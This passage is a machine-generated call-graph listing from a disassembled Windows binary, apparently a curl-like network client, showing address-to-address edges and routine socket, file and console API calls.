41420->41410 41420->41418 41423 e3459 free 41420->41423 41421 e353e 41421->41418 41464 e365e 41421->41464 41636 e6233 9 API calls _ValidateLocalCookies 41421->41636 41422 e34dd 41422->41411 41422->41418 41426 e34ff free 41422->41426 41423->41410 41426->41411 41427 e366f 41427->41418 41429 e36e3 41427->41429 41641 d5f16 24 API calls _ValidateLocalCookies 41427->41641 41429->41418 41431 e3776 41429->41431 41467 e36e7 41429->41467 41644 d5f16 24 API calls _ValidateLocalCookies 41429->41644 41430 e358c 41438 e35a5 free 41430->41438 41430->41464 41431->41418 41647 d5f16 24 API calls _ValidateLocalCookies 41431->41647 41435 e3693 41435->41429 41642 d2813 malloc strtoul free 41435->41642 41436 e3711 41439 e3742 41436->41439 41645 d2813 malloc strtoul free 41436->41645 41637 d649e 96 API calls 41438->41637 41439->41418 41439->41431 41646 da7f6 free 41439->41646 41440 e36c4 41440->41418 41643 da7f6 free 41440->41643 41444 e35c2 41444->41418 41448 e35f8 41444->41448 41453 e35e8 free 41444->41453 41445 e37db 41445->41418 41649 d5f16 24 API calls _ValidateLocalCookies 41445->41649 41638 d5f16 24 API calls _ValidateLocalCookies 41448->41638 41449 e378d 41449->41418 41648 d5f16 24 API calls _ValidateLocalCookies 41449->41648 41452 e37f8 41455 e37fe 41452->41455 41456 e3814 strtoul 41452->41456 41453->41448 41454 e3607 41454->41418 41639 d5f16 24 API calls _ValidateLocalCookies 41454->41639 41455->41467 41650 d5f16 24 API calls _ValidateLocalCookies 41455->41650 41456->41455 41458 e361d 41459 e3626 free 41458->41459 41460 e3642 41458->41460 41459->41418 41462 dd632 17 API calls 41460->41462 41462->41464 41640 e3271 17 API calls 41464->41640 41465 e385c 41465->41465 41465->41467 41651 e32ec 42 API calls _ValidateLocalCookies 41465->41651 41467->41418 41469 e4101 41468->41469 41473 e4106 41468->41473 41652 e404c malloc strtoul free free 41469->41652 41471 e4174 41472 e41bb 41471->41472 41654 d2677 41471->41654 41477 e41d8 free 41472->41477 41478 e4205 41472->41478 41473->41471 41480 e4133 41473->41480 41502 e4140 free 41473->41502 41491 e41fd free 41477->41491 41483 e4217 free 41478->41483 41661 e3b5f 21 API calls _ValidateLocalCookies 41478->41661 41479 e41a5 41479->41472 41481 dd632 17 API calls 41479->41481 41653 dd6ad 17 API calls _ValidateLocalCookies 41480->41653 41481->41472 41482 e4432 free 41482->41059 41489 e426a 41483->41489 41490 e4234 41483->41490 41484 d2677 3 API calls 41484->41479 41492 e4299 41489->41492 41498 e4291 free 41489->41498 41490->41489 41496 e4265 free 41490->41496 41491->41483 41493 e42a0 41492->41493 41662 e3c44 125 API calls 41492->41662 41493->41502 41503 e4322 41493->41503 41663 e3c44 125 API calls 41493->41663 41495 e42c1 free 41495->41493 41495->41502 41496->41489 41498->41492 41499 e42fb free 41499->41502 41499->41503 41502->41482 41503->41502 41504 e43b3 free 41503->41504 41504->41502 41506 e469f 41505->41506 41507 e46e6 41505->41507 41506->41507 41508 e46a8 41506->41508 41509 110ca6 _ValidateLocalCookies 5 API calls 41507->41509 41510 d201d 14 API calls 41508->41510 41512 e46f3 41509->41512 41511 e46c6 41510->41511 41664 d649e 96 API calls 41511->41664 41512->41053 41515 e46f5 41512->41515 41514 e46da 41514->41507 41516 e4724 41515->41516 41517 e4780 41515->41517 41516->41517 41520 e473c free 41516->41520 41519 e47b3 41517->41519 41521 e479c free 41517->41521 41518 e49ef 41524 e4a04 41518->41524 41552 e4975 41518->41552 41670 da7f6 free 41518->41670 41519->41518 41522 e48fb 41519->41522 41523 e4817 41519->41523 41541 e49ea 41519->41541 41530 e4755 free 41520->41530 41521->41519 41667 f8b9d 15 API calls _ValidateLocalCookies 41522->41667 41531 d2677 3 API calls 41523->41531 41528 e4a16 41524->41528 41524->41541 41524->41552 41525 e4995 41529 e49ab 41525->41529 41525->41541 41671 d649e 96 API calls 41528->41671 41669 d649e 96 API calls 41529->41669 41536 e4772 free 41530->41536 41537 e4821 41531->41537 41535 e4912 41538 e4915 41535->41538 41536->41517 41537->41538 41543 e4849 41537->41543 41544 e48e2 free 41537->41544 41539 dd632 17 API calls 41538->41539 41542 e492d 41538->41542 41539->41542 41540 e49bf 41540->41541 41541->41063 41542->41518 41542->41541 41545 e4949 free 41542->41545 41665 f8b9d 15 API calls _ValidateLocalCookies 41543->41665 41544->41541 41545->41552 41547 e485f free 41553 e487d 41547->41553 41554 e48c6 free 41547->41554 41550 e4a2a 41550->41541 41550->41552 41552->41525 41552->41541 41668 da7f6 free 41552->41668 41553->41544 41556 e4898 41553->41556 41554->41538 41666 f8b9d 15 API calls _ValidateLocalCookies 41556->41666 41558 e48ae free 41558->41554 41563 e4dbf 41560->41563 41561 e4e7d 41561->41053 41566 e2e9b 41561->41566 41563->41561 41564 dd632 17 API calls 41563->41564 41565 e4e2d free 41563->41565 41672 e4c99 22 API calls ___from_strstr_to_strchr 41563->41672 41564->41563 41565->41563 41567 e2ea9 41566->41567 41568 e2eb8 41567->41568 41569 dd632 17 API calls 41567->41569 41568->41053 41568->41068 41568->41069 41569->41568 41673 e68f4 41570->41673 41629->41408 41630->41409 41631->41420 41632->41416 41633->41422 41634->41415 41635->41421 41636->41430 41637->41444 41638->41454 41639->41458 41640->41427 41641->41435 41642->41440 41643->41429 41644->41436 41645->41439 41646->41431 41647->41449 41648->41445 41649->41452 41650->41465 41651->41467 41652->41473 41653->41502 41658 d26a4 41654->41658 41655 d26c4 realloc 41656 d268e GetEnvironmentVariableA 41655->41656 41657 d26ce free 41655->41657 41656->41657 41656->41658 41660 d26e4 41657->41660 41658->41655 41658->41657 41658->41660 41660->41479 41660->41484 41661->41483 41662->41495 41663->41499 41664->41514 41665->41547 41666->41558 41667->41535 41668->41525 41669->41540 41670->41524 41671->41550 41672->41563 41829 ddd6c 7 API calls 41828->41829 41830 df1d6 41829->41830 41831 df1ed 41830->41831 41837 df204 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41830->41837 41892 dd6ad 17 API calls _ValidateLocalCookies 41831->41892 41833 df1fa 41833->41144 41834 df34a 41834->41833 41893 d941d 19 API calls 2 library calls 41834->41893 41837->41834 41847 dee55 41837->41847 41839 de678 41838->41839 41840 de6a5 41839->41840 41843 de6b8 41839->41843 41979 de49e 38 API calls _ValidateLocalCookies 41839->41979 41964 de574 41840->41964 41844 110ca6 _ValidateLocalCookies 5 API calls 41843->41844 41845 de6d9 41844->41845 41846 e2e23 17 API calls 41845->41846 41846->41144 41894 df472 41847->41894 41851 110ca6 _ValidateLocalCookies 5 API calls 41853 df1b8 41851->41853 41853->41837 41854 deede _errno _errno 41936 da0b8 26 API calls _strrchr 41854->41936 41855 def19 41857 dd632 17 API calls 41855->41857 41861 def2e 41857->41861 41858 deefc 41937 dd6ad 17 API calls _ValidateLocalCookies 41858->41937 41860 def6b 41919 dedc5 41860->41919 41861->41860 41911 ded5e setsockopt 41861->41911 41863 df3fc 2 API calls 41885 df054 41863->41885 41866 deff9 41938 ddedf 455 API calls _ValidateLocalCookies 41866->41938 41868 df060 ioctlsocket 41871 f480b 2 API calls 41868->41871 41870 def9c 41884 defda 41870->41884 41886 def0b 41870->41886 41873 df08e 41871->41873 41872 df009 41872->41868 41874 df017 41872->41874 41875 df0d6 41873->41875 41947 d941d 19 API calls 2 library calls 41873->41947 41939 df3fc 41874->41939 41881 df0ff connect 41875->41881 41882 df128 WSAGetLastError 41875->41882 41875->41885 41878 df026 41878->41885 41879 df0c0 41948 d941d 19 API calls 2 library calls 41879->41948 41881->41882 41881->41885 41883 df13b 41882->41883 41882->41885 41883->41885 41949 da0b8 26 API calls _strrchr 41883->41949 41884->41866 41884->41868 41885->41851 41886->41863 41888 df156 41892->41833 41893->41833 41895 df4bc 41894->41895 41896 df528 socket 41895->41896 41900 df4f6 41895->41900 41896->41900 41897 df53d 41899 110ca6 _ValidateLocalCookies 5 API calls 41897->41899 41898 df54e ioctlsocket 41898->41897 41901 deeac 41899->41901 41900->41897 41900->41898 41901->41885 41902 de407 41901->41902 41903 de46f 41902->41903 41904 de416 41902->41904 41905 d201d 14 API calls 41903->41905 41907 de487 41903->41907 41906 de456 _errno 41904->41906 41950 e9bff 17 API calls 41904->41950 41905->41907 41906->41907 41907->41854 41907->41855 41909 de431 41909->41906 41910 de437 htons 41909->41910 41910->41907 41912 ded94 WSAGetLastError 41911->41912 41918 dedb5 41911->41918 41951 da0b8 26 API calls _strrchr 41912->41951 41913 110ca6 _ValidateLocalCookies 5 API calls 41915 dedc3 41913->41915 41915->41860 41916 deda8 41917 dd632 17 API calls 41916->41917 41917->41918 41918->41913 41920 dedea 41919->41920 41924 dedf8 41919->41924 41952 d0b38 41920->41952 41922 dee18 getsockopt 41925 dee3e setsockopt 41922->41925 41926 dee36 41922->41926 41923 dedff 41923->41870 41927 ddcb0 setsockopt 41923->41927 41924->41922 41924->41923 41925->41923 41926->41923 41926->41925 41928 ddcfd WSAIoctl 41927->41928 41929 ddcec 41927->41929 41931 ddcf8 41928->41931 41932 ddd48 WSAGetLastError 41928->41932 41930 dd632 17 API calls 41929->41930 41930->41931 41934 110ca6 _ValidateLocalCookies 5 API calls 41931->41934 41933 dd632 17 API calls 41932->41933 41933->41931 41935 ddd6a 41934->41935 41935->41870 41936->41858 41937->41886 41938->41872 41940 df40d 41939->41940 41941 df432 closesocket 41939->41941 41942 df424 41940->41942 41943 df440 41940->41943 41946 df43b 41941->41946 41962 d8f25 free 41942->41962 41963 d8f25 free 41943->41963 41946->41878 41947->41879 41948->41875 41949->41888 41950->41909 41951->41916 41953 d0b63 GetModuleHandleA GetProcAddress 41952->41953 41954 d0b85 41952->41954 41953->41954 41955 d0ba0 41954->41955 41956 d0be2 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 41954->41956 41959 110ca6 _ValidateLocalCookies 5 API calls 41955->41959 41957 d0c68 VerifyVersionInfoW 41956->41957 41958 d0c56 RtlVerifyVersionInfo 41956->41958 41957->41955 41958->41955 41960 d0c84 41959->41960 41960->41924 41962->41941 41963->41946 41980 1120c0 41964->41980 41966 de5b4 getsockname 41967 de5f0 41966->41967 41968 de5d0 WSAGetLastError 41966->41968 41969 de407 19 API calls 41967->41969 41982 da0b8 26 API calls _strrchr 41968->41982 41971 de608 41969->41971 41973 de63b 41971->41973 41974 de60e _errno _errno 41971->41974 41972 de5e6 41984 dd6ad 17 API calls _ValidateLocalCookies 41972->41984 41977 110ca6 _ValidateLocalCookies 5 API calls 41973->41977 41983 da0b8 26 API calls _strrchr 41974->41983 41978 de64b 41977->41978 41978->41843 41979->41840 41981 1120d7 41980->41981 41981->41966 41981->41981 41982->41972 41983->41972 41984->41973 41985->41155 41988 efde4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41986->41988 41987 efe18 41989 d2119 14 API calls 41987->41989 41988->41987 41990 d2119 14 API calls 41988->41990 41992 efe2b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41988->41992 41989->41992 41990->41987 42015 ce2dd 41992->42015 41994 ce2dd 14 API calls 41995 f0056 41994->41995 41996 ce2dd 14 API calls 41995->41996 42000 f0064 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41996->42000 41999 ce127 14 API calls 42001 f0171 41999->42001 42025 ce127 42000->42025 42002 ce127 14 API calls 42001->42002 42003 f0189 42002->42003 42004 ce127 14 API calls 42003->42004 42005 f01a1 42004->42005 42006 ce127 14 API calls 42005->42006 42007 f01bf 42006->42007 42008 ce127 14 API calls 42007->42008 42009 f01d6 42008->42009 42010 d2119 14 API calls 42009->42010 42011 f01f2 fflush 42010->42011 42012 110ca6 _ValidateLocalCookies 5 API calls 42011->42012 42013 f020f 42012->42013 42013->40991 42014->40991 42017 ce2f7 __aulldiv 42015->42017 42016 ce2fd 42016->41994 42017->42016 42019 ce392 __aulldiv 42017->42019 42022 ce32c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42017->42022 42018 ce3ee 42020 d201d 14 API calls 42018->42020 42019->42018 42021 ce3b4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42019->42021 42020->42016 42023 d201d 14 API calls 42021->42023 42024 d201d 14 API calls 42022->42024 42023->42016 42024->42016 42026 ce13b 42025->42026 42028 ce180 __aulldiv 42026->42028 42030 ce145 42026->42030 42027 d201d 14 API calls 42029 ce1fc 42027->42029 42031 d201d 14 API calls 42028->42031 42029->41999 42030->42027 42031->42029 42032->41011 42033->41012 42034->41014 42036->41021 42037 d850e 42038 d8536 42037->42038 42050 d7db0 42038->42050 42069 ebb23 42038->42069 42041 d8616 42042 d86a9 42041->42042 42043 d6f2d 137 API calls 42041->42043 42104 ec6a7 19 API calls 42041->42104 42044 d878c 42042->42044 42045 d8773 42042->42045 42047 d874d free 42042->42047 42048 d86c5 42042->42048 42043->42041 42044->42050 42107 d941d 19 API calls 2 library calls 42044->42107 42051 d6f2d 137 API calls 42045->42051 42047->42045 42056 d86e0 free 42048->42056 42067 d836c 42048->42067 42049 d7bff 42055 d95e3 19 API calls 42049->42055 42058 f0211 20 API calls 42049->42058 42059 d89ca 42049->42059 42068 e2166 117 API calls 42049->42068 42103 d7961 137 API calls 42049->42103 42109 e9e52 18 API calls 42049->42109 42050->42049 42050->42067 42108 d7961 137 API calls 42050->42108 42054 d8781 42051->42054 42106 ec1fd 111 API calls 42054->42106 42055->42049 42105 ec1fd 111 API calls 42056->42105 42058->42049 42061 d86fa free 42065 d871d 42061->42065 42061->42067 42066 d6f2d 137 API calls 42065->42066 42066->42050 42068->42049 42070 ebb58 42069->42070 42071 ebb9e 42070->42071 42110 ef235 42070->42110 42073 ebbab 42071->42073 42074 ebbc0 42071->42074 42143 dd6ad 17 API calls _ValidateLocalCookies 42073->42143 42083 ebbdd 42074->42083 42120 eb0ce 42074->42120 42076 ebbb6 42076->42041 42078 ebbfe 42144 eb751 60 API calls 42078->42144 42079 ebc14 42081 f480b 2 API calls 42079->42081 42089 ebc1d 42081->42089 42082 ebc0b 42082->42076 42082->42079 42083->42076 42083->42078 42083->42079 42084 ebca7 42085 f0211 20 API calls 42084->42085 42086 ebcb5 42085->42086 42086->42076 42145 f497a 19 API calls 42086->42145 42088 ebcd3 42088->42076 42092 ddd6c 7 API calls 42088->42092 42096 ebd4d 42088->42096 42089->42084 42091 dd632 17 API calls 42089->42091 42090 ebdf9 42093 f0211 20 API calls 42090->42093 42091->42084 42094 ebcf2 42092->42094 42093->42076 42094->42076 42097 ebd15 42094->42097 42098 ebd52 42094->42098 42095 ebdce 42095->42090 42149 dd6ad 17 API calls _ValidateLocalCookies 42095->42149 42096->42090 42096->42095 42148 dd6ad 17 API calls _ValidateLocalCookies 42096->42148 42146 dd6ad 17 API calls _ValidateLocalCookies 42097->42146 42147 dd6ad 17 API calls _ValidateLocalCookies 42098->42147 42103->42049 42104->42041 42105->42061 42106->42044 42107->42050 42108->42049 42109->42049 42111 ef259 42110->42111 42112 ef273 42110->42112 42111->42112 42113 ef261 42111->42113 42115 ef35e 12 API calls 42112->42115 42150 ef1f3 WSASetLastError Sleep 42113->42150 42119 ef2ca 42115->42119 42116 ef26c 42116->42119 42117 110ca6 _ValidateLocalCookies 5 API calls 42118 ef35c 42117->42118 42118->42071 42119->42117 42123 eb108 42120->42123 42122 ef716 7 API calls 42122->42123 42123->42122 42124 eb2d1 42123->42124 42125 f480b 2 API calls 42123->42125 42128 eb63a 42123->42128 42129 eb2b7 42123->42129 42134 eb35a 42123->42134 42135 eb641 42123->42135 42139 dd632 17 API calls 42123->42139 42141 dda02 62 API calls 42123->42141 42151 ddbb6 42123->42151 42155 106c36 42123->42155 42163 f3eb5 182 API calls 42123->42163 42164 f2e63 17 API calls 42123->42164 42165 f9e9e 62 API calls 42123->42165 42126 dd632 17 API calls 42124->42126 42124->42128 42125->42123 42126->42128 42128->42083 42129->42124 42132 dd632 17 API calls 42129->42132 42132->42124 42133 ddc17 fwrite fwrite 42133->42134 42134->42123 42134->42133 42136 eb65b 42135->42136 42137 eb646 42135->42137 42167 dd6ad 17 API calls _ValidateLocalCookies 42136->42167 42166 dd6ad 17 API calls _ValidateLocalCookies 42137->42166 42139->42123 42141->42123 42143->42076 42144->42082 42145->42088 42146->42096 42147->42096 42148->42095 42149->42095 42150->42116 42152 ddc00 42151->42152 42168 105aa0 42152->42168 42156 106c65 42155->42156 42161 106c80 42155->42161 42156->42161 42398 dda02 42156->42398 42158 dd14a free realloc free 42158->42161 42159 106c86 42159->42123 42161->42158 42161->42159 42162 dda02 62 API calls 42161->42162 42407 d09fa _errno strtoll _errno 42161->42407 42162->42161 42163->42123 42164->42123 42165->42123 42166->42128 42167->42128 42169 105b13 42168->42169 42170 105b2a 42168->42170 42169->42170 42171 105b18 42169->42171 42172 105b31 42170->42172 42175 105b51 42170->42175 42173 dd632 17 API calls 42171->42173 42174 dd632 17 API calls 42172->42174 42178 105b23 42173->42178 42174->42178 42176 105b7c 42175->42176 42177 105baa realloc 42175->42177 42194 105c1a 42175->42194 42210 ddb77 recv 42176->42210 42177->42176 42180 105bb4 42177->42180 42181 d0b38 14 API calls 42178->42181 42185 105f2e 42178->42185 42213 dd6ad 17 API calls _ValidateLocalCookies 42180->42213 42184 105f20 42181->42184 42182 105bf9 42189 105c1e 42182->42189 42190 105c0f 42182->42190 42182->42194 42184->42185 42186 dd632 17 API calls 42184->42186 42187 110ca6 _ValidateLocalCookies 5 API calls 42185->42187 42186->42185 42188 ddc02 42187->42188 42188->42123 42192 dd632 17 API calls 42189->42192 42191 dd632 17 API calls 42190->42191 42191->42194 42192->42194 42193 105e49 42234 da216 23 API calls _ValidateLocalCookies 42193->42234 42194->42178 42194->42193 42196 105d41 realloc 42194->42196 42201 105d4d 42194->42201 42195 105e22 42195->42193 42206 105eb2 42195->42206 42199 105e9d 42196->42199 42196->42201 42198 dd632 17 API calls 42202 105dc7 42198->42202 42235 dd6ad 17 API calls _ValidateLocalCookies 42199->42235 42200 105e8b 42203 dd632 17 API calls 42200->42203 42201->42195 42201->42198 42202->42206 42207 dd632 17 API calls 42202->42207 42203->42178 42205 dd632 17 API calls 42205->42178 42206->42178 42206->42205 42208 105df0 42207->42208 42214 1055c7 42208->42214 42211 ddbad 42210->42211 42212 ddb8e WSAGetLastError 42210->42212 42211->42182 42212->42182 42213->42178 42215 105600 42214->42215 42233 1055f3 42214->42233 42216 ddd6c 7 API calls 42215->42216 42230 105636 42215->42230 42218 105617 42216->42218 42217 ddd6c 7 API calls 42217->42230 42220 1057cb 42218->42220 42236 104585 42218->42236 42219 105730 42221 105735 42219->42221 42227 10574d 42219->42227 42338 dd6ad 17 API calls _ValidateLocalCookies 42220->42338 42336 1051ec 48 API calls _ValidateLocalCookies 42221->42336 42225 105741 42225->42227 42225->42233 42227->42220 42229 1057a7 42227->42229 42228 ef235 12 API calls 42228->42230 42231 1057b2 WSAGetLastError 42229->42231 42230->42217 42230->42219 42230->42220 42230->42227 42230->42228 42230->42231 42230->42233 42288 104b3e 42230->42288 42337 dd6ad 17 API calls _ValidateLocalCookies 42231->42337 42233->42195 42234->42200 42235->42206 42237 1045d5 42236->42237 42238 d0b38 14 API calls 42237->42238 42239 104615 42238->42239 42240 104627 42239->42240 42241 dd632 17 API calls 42239->42241 42242 104632 GetModuleHandleA GetProcAddress 42240->42242 42247 104667 42240->42247 42241->42240 42243 10464d 42242->42243 42242->42247 42244 d0b38 14 API calls 42243->42244 42245 10465c 42244->42245 42245->42247 42246 d0b38 14 API calls 42253 1046cb 42246->42253 42247->42246 42247->42253 42249 110ca6 _ValidateLocalCookies 5 API calls 42251 104b3c 42249->42251 42251->42230 42252 1047a3 42254 1047e5 42252->42254 42255 1047f9 _strdup 42252->42255 42285 1047f0 42252->42285 42256 104814 inet_pton 42253->42256 42287 104b17 42253->42287 42339 103d21 42253->42339 42350 dd6ad 17 API calls _ValidateLocalCookies 42254->42350 42255->42256 42255->42285 42258 104846 42256->42258 42259 10482d inet_pton 42256->42259 42261 dd632 17 API calls 42258->42261 42259->42258 42260 104851 42259->42260 42262 dd632 17 API calls 42260->42262 42264 10488b calloc 42260->42264 42261->42260 42262->42264 42265 10497c calloc 42264->42265 42266 10498f 42265->42266 42269 10499a 42265->42269 42351 dd6ad 17 API calls _ValidateLocalCookies 42266->42351 42268 104a7a 42347 dd87f 42268->42347 42269->42268 42271 104a0b free 42269->42271 42272 104a67 42271->42272 42273 104a27 42271->42273 42356 da216 23 API calls _ValidateLocalCookies 42272->42356 42274 104a43 42273->42274 42352 da216 23 API calls _ValidateLocalCookies 42273->42352 42354 da216 23 API calls _ValidateLocalCookies 42274->42354 42278 104a6d 42357 dd6ad 17 API calls _ValidateLocalCookies 42278->42357 42279 104a36 42353 dd6ad 17 API calls _ValidateLocalCookies 42279->42353 42280 104a50 42355 dd6ad 17 API calls _ValidateLocalCookies 42280->42355 42285->42249 42359 dd6ad 17 API calls _ValidateLocalCookies 42287->42359 42289 104ba2 42288->42289 42328 104c51 42288->42328 42290 104bb5 malloc 42289->42290 42291 104bdf 42289->42291 42289->42328 42292 104bd8 42290->42292 42298 105102 42290->42298 42291->42292 42293 104c0e 42291->42293 42292->42291 42297 104bfe malloc 42292->42297 42299 104c39 realloc 42293->42299 42306 104c5a 42293->42306 42294 110ca6 _ValidateLocalCookies 5 API calls 42295 104f3d 42294->42295 42295->42230 42297->42293 42297->42298 42300 104c41 42299->42300 42299->42306 42385 dd6ad 17 API calls _ValidateLocalCookies 42300->42385 42301 ddb77 2 API calls 42301->42306 42302 104cd0 malloc 42302->42298 42302->42306 42304 104f1b 42386 dd6ad 17 API calls _ValidateLocalCookies 42304->42386 42306->42301 42306->42302 42306->42304 42307 104dda free 42306->42307 42308 104f7f 42306->42308 42315 dd87f 40 API calls 42306->42315 42323 105008 42306->42323 42306->42328 42329 105032 42306->42329 42307->42298 42307->42306 42309 104ff0 42308->42309 42310 104f8e 42308->42310 42392 da216 23 API calls _ValidateLocalCookies 42309->42392 42312 104fe1 42310->42312 42313 104f95 42310->42313 42391 da216 23 API calls _ValidateLocalCookies 42312->42391 42317 104fc0 42313->42317 42318 104f9f 42313->42318 42315->42306 42316 104ff6 42393 dd6ad 17 API calls _ValidateLocalCookies 42316->42393 42389 da216 23 API calls _ValidateLocalCookies 42317->42389 42387 da216 23 API calls _ValidateLocalCookies 42318->42387 42319 104fc5 42390 dd6ad 17 API calls _ValidateLocalCookies 42319->42390 42394 dd6ad 17 API calls _ValidateLocalCookies 42323->42394 42324 104fa6 42388 dd6ad 17 API calls _ValidateLocalCookies 42324->42388 42328->42294 42329->42328 42330 1050d6 42329->42330 42395 106451 48 API calls _ValidateLocalCookies 42329->42395 42330->42328 42397 10f363 77 API calls _ValidateLocalCookies 42330->42397 42332 1050b2 42332->42330 42334 1050be 42332->42334 42396 dd6ad 17 API calls _ValidateLocalCookies 42334->42396 42336->42225 42337->42233 42338->42233 42340 103d63 42339->42340 42341 dd632 17 API calls 42340->42341 42342 103e85 42341->42342 42360 dd6ad 17 API calls _ValidateLocalCookies 42342->42360 42344 10455e 42345 110ca6 _ValidateLocalCookies 5 API calls 42344->42345 42346 104570 42345->42346 42346->42252 42361 dd7c0 42347->42361 42350->42285 42351->42269 42352->42279 42353->42274 42354->42280 42355->42285 42356->42278 42357->42268 42358 dd6ad 17 API calls _ValidateLocalCookies 42358->42287 42359->42285 42360->42344 42373 dd482 42361->42373 42364 dd808 send 42365 dd81f WSAGetLastError 42364->42365 42367 dd7fd 42364->42367 42365->42367 42368 dd839 42365->42368 42366 110ca6 _ValidateLocalCookies 5 API calls 42370 dd87d 42366->42370 42367->42366 42383 da0b8 26 API calls _strrchr 42368->42383 42370->42285 42370->42358 42371 dd847 42384 dd6ad 17 API calls _ValidateLocalCookies 42371->42384 42374 dd57d 42373->42374 42375 dd4b9 42373->42375 42374->42364 42374->42367 42375->42374 42376 ef235 12 API calls 42375->42376 42377 dd4f6 42376->42377 42377->42374 42378 dd502 42377->42378 42379 dd55b recv 42378->42379 42381 dd52f malloc 42378->42381 42379->42374 42380 dd53f 42379->42380 42380->42374 42381->42380 42382 dd544 42381->42382 42382->42379 42383->42371 42384->42367 42385->42328 42386->42328 42387->42324 42388->42328 42389->42319 42390->42328 42391->42319 42392->42316 42393->42323 42394->42328 42395->42332 42396->42328 42397->42328 42401 dda33 42398->42401 42405 dda47 42398->42405 42400 ddae6 42402 dda3c 42400->42402 42403 ddb2f 42400->42403 42400->42405 42401->42400 42401->42402 42401->42403 42408 c2230 42401->42408 42429 dd97b free realloc free 42402->42429 42403->42405 42430 dd6ad 17 API calls _ValidateLocalCookies 42403->42430 42405->42161 42407->42161 42409 c227b 42408->42409 42412 c2284 42408->42412 42431 c1fdc 42409->42431 42411 c22df _fileno _get_osfhandle _fileno _isatty 42413 c230b GetConsoleScreenBufferInfo 42411->42413 42414 c2392 fwrite 42411->42414 42412->42411 42415 c22cb 42412->42415 42427 c22bb 42412->42427 42413->42414 42416 c231c MultiByteToWideChar malloc 42413->42416 42417 c23ae 42414->42417 42422 110ca6 _ValidateLocalCookies 5 API calls 42415->42422 42416->42415 42419 c2343 MultiByteToWideChar 42416->42419 42418 c23d0 42417->42418 42466 d2378 62 API calls _ValidateLocalCookies 42417->42466 42418->42415 42421 c23d9 fflush 42418->42421 42423 c2386 free 42419->42423 42424 c2361 WriteConsoleW 42419->42424 42421->42415 42425 c23fb 42422->42425 42423->42415 42424->42423 42426 c2376 free 42424->42426 42425->42401 42426->42417 42463 c913e 42427->42463 42429->42405 42430->42405 42432 c221b 42431->42432 42433 c2005 42431->42433 42434 c913e 20 API calls 42432->42434 42433->42432 42437 c200d 42433->42437 42435 c2041 42434->42435 42435->42412 42436 c21b6 fopen 42439 c21cb _errno strerror 42436->42439 42440 c21f5 free 42436->42440 42437->42436 42438 c2067 42437->42438 42444 c2034 42437->42444 42445 c2082 _errno 42438->42445 42450 c2090 42438->42450 42468 d0b16 _open 42438->42468 42442 c913e 20 API calls 42439->42442 42440->42435 42443 c21e9 free 42442->42443 42443->42435 42467 c9199 20 API calls 42444->42467 42445->42438 42445->42450 42446 c2191 42446->42439 42448 c2196 _fdopen 42446->42448 42448->42440 42449 c21aa _close 42448->42449 42449->42439 42450->42446 42450->42448 42450->42450 42451 c20dc malloc 42450->42451 42452 c20c9 free 42450->42452 42453 c20eb 42451->42453 42454 c2107 42451->42454 42452->42444 42469 c9199 20 API calls 42453->42469 42457 c211f _errno 42454->42457 42459 c217f 42454->42459 42460 d201d 14 API calls 42454->42460 42462 c216f _errno 42454->42462 42470 d0b16 _open 42454->42470 42456 c20f8 free 42456->42435 42457->42454 42458 c212a _errno 42457->42458 42458->42454 42458->42459 42459->42446 42460->42454 42462->42454 42471 c903b 42463->42471 42466->42418 42467->42435 42468->42438 42469->42456 42470->42454 42472 c9053 42471->42472 42472->42472 42473 c9117 42472->42473 42481 d206f 42472->42481 42473->42415 42475 c9079 42475->42473 42476 c9096 fputs 42475->42476 42479 c90ca fwrite fputs 42475->42479 42480 c9101 42475->42480 42476->42475 42478 c9103 fputs 42476->42478 42478->42480 42479->42476 42479->42480 42486 d2920 free 42480->42486 42482 d1535 14 API calls 42481->42482 42483 d20a2 42482->42483 42485 d20b0 42483->42485 42487 dd126 free 42483->42487 42485->42475 42486->42473 42487->42485 43779 d7f39 43792 de820 43779->43792 43782 d6f2d 137 API calls 43783 d7ebc 43782->43783 43785 d7bff 43783->43785 43830 d7961 137 API calls 43783->43830 43786 f0211 20 API calls 43785->43786 43787 d89ca 43785->43787 43788 d95e3 19 API calls 43785->43788 43791 e2166 117 API calls 43785->43791 43829 d7961 137 API calls 43785->43829 43831 e9e52 18 API calls 43785->43831 43786->43785 43788->43785 43791->43785 43793 de873 43792->43793 43805 de869 43792->43805 43794 f480b 2 API calls 43793->43794 43795 de87f 43794->43795 43796 de894 43795->43796 43819 de8e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43795->43819 43798 de6db 470 API calls 43796->43798 43797 110ca6 _ValidateLocalCookies 5 API calls 43799 d7f49 43797->43799 43800 de8ae 43798->43800 43799->43782 43799->43783 43803 de7cc 44 API calls 43800->43803 43800->43805 43801 ef235 12 API calls 43801->43819 43802 dec06 43804 ddd6c 7 API calls 43802->43804 43803->43805 43806 dec1b 43804->43806 43805->43797 43807 dec26 43806->43807 43811 dec67 43806->43811 43852 dd6ad 17 API calls _ValidateLocalCookies 43807->43852 43808 de272 SleepEx getsockopt WSAGetLastError 43808->43819 43809 deb5c 43812 debab 43809->43812 43817 df3fc 2 API calls 43809->43817 43810 dd632 17 API calls 43810->43819 43811->43805 43853 de30b 480 API calls 43811->43853 43832 de6db 43812->43832 43815 dea72 WSASetLastError 43815->43819 43817->43812 43819->43801 43819->43802 43819->43808 43819->43809 43819->43810 43819->43815 43824 de30b 480 API calls 43819->43824 43827 ddd6c 7 API calls 43819->43827 43850 ee310 17 API calls 43819->43850 43851 da0b8 26 API calls _strrchr 43819->43851 43820 dec9a 43820->43805 43854 da0b8 26 API calls _strrchr 43820->43854 43824->43819 43826 decef 43855 dd6ad 17 API calls _ValidateLocalCookies 43826->43855 43827->43819 43829->43785 43830->43785 43831->43785 43834 de6fb 43832->43834 43839 de772 43832->43839 43833 de798 43858 ed2ae 446 API calls _ValidateLocalCookies 43833->43858 43834->43833 43835 de779 43834->43835 43837 de762 43834->43837 43857 ed818 470 API calls _ValidateLocalCookies 43835->43857 43837->43835 43840 de767 43837->43840 43839->43805 43842 de7cc 43839->43842 43856 dd6ad 17 API calls _ValidateLocalCookies 43840->43856 43843 de7ee 43842->43843 43844 de7fa 43842->43844 43845 ef716 7 API calls 43843->43845 43846 de64d 42 